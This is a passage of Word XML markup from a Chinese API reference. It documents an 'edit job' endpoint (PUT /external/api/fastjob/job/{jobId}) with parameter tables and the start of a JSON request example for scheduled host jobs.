        <w:gridCol w:w="1399"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1004"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="70CC2B4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595FC09" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65F28E2E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25455B4C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6FB2B702" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63A442BD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FA13CAE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57A1A7E4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>作业id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1255F878" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3623B81F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>createdTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="135B426C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F0FF5D0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>创建时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0729C726" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="387" w:name="_Toc115166266"/>
      <w:bookmarkStart w:id="388" w:name="编辑作业"/>
      <w:bookmarkEnd w:id="386"/>
      <w:r>
        <w:t>编辑作业</w:t>
      </w:r>
      <w:bookmarkEnd w:id="387"/>
    </w:p>
    <w:p w14:paraId="68C9AF14" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4E8DE6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>PUT /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fastjob</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/job/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jobId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA67F28"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341"/>
        <w:gridCol w:w="1807"/>
        <w:gridCol w:w="4123"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="0ADBBCC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A68E9C3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55DCBB93" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1014D929" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="793B606B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AE70C8B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>jobId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CD904F0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C9F603A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>作业id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="681441E9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75EED06B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65BE9A45" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C313D94" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>作业名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1C60B07B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C317E1B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>osType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41BFB251" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7228A577" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>系统类型(必填)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="190F199D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="445F280A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="118FDACE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56C9DC23" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>作业描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0FBE4F0F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="735648EA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>realm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="503831A4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Realm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16D54B81" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>作业范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="727734CE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12EBB8F6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>realmName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="782365EB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0109DD30" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>作业执行范围描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="618309D8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6231AFC8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>taskType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27317515" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F656FE9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>任务类型 1. 系统内置任务, 2, 用户添加任务</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="11F721A6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B1D9941" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>taskId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="398D4122" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B088C31" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>任务id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="085CAD85" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50D29BDE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>taskParams</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AB28730" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List&lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>TaskParam</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DF919B9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>任务参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="46F3BE6E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66797C97" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DAD8C50" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65ECC2A2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>表达式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="30C41B37" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FDD6C4A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cronEnable</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C8FFCB1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7ADDF9C6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否开启定时执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6E54D13D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EBFD35" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>PUT  /</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fastjob</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/job/5d1b568b67657c1b743cf33b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665DB165" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"name"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>testxxxx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"osType"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>description"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"description</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> xxx"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"realm"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"type"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>},</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>realmName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"全部主机"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"taskType"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"taskId"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"0478ee5024763edc6d3c"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>taskParams</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
